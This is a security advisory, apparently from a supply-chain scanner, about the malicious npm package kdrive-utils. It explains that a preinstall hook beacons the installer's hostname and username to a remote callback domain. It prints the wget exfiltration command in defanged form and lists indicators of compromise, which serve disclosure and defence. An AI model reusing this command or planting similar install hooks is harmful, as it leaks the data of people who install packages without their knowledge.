kdrive-utils@99.9.9
Malicious code in kdrive-utils (npm)
T1059.007 · JavaScriptT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel
Analysis
The preinstall lifecycle hook (runs automatically during npm install) silently sends the installer's hostname and username via HTTP GET to an out-of-band callback domain d8svb0ao12pnoovdaih0giunhdew5oqa4[.]oast[.]live. The payload is: wget -q -O- "hxxp://d8svb0ao12pnoovdaih0giunhdew5oqa4[.]oast[.]live/$(hostname)/$(whoami)". The package contains no functional code beyond this recon beacon. IOCs: oast[.]live (domain), d8svb0ao12pnoovdaih0giunhdew5oqa4[.]oast[.]live, the full exfiltration path /$(hostname)/$(whoami).
- analyzed by
- Leitwacht
- first seen
- Jun 23, 2026, 03:10 AM
- analyzed
- Jun 23, 2026, 03:10 AM
Related advisories
- pino-zod@1.0.121
- zod-pino@1.0.122
- search-from-search@999.99.99
- hunsterx-package@7.0.1
- crosswalker@18.2.1
- crud-respect@999.99.99
- hyperpure-core@1.0.0
- zomato-config@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.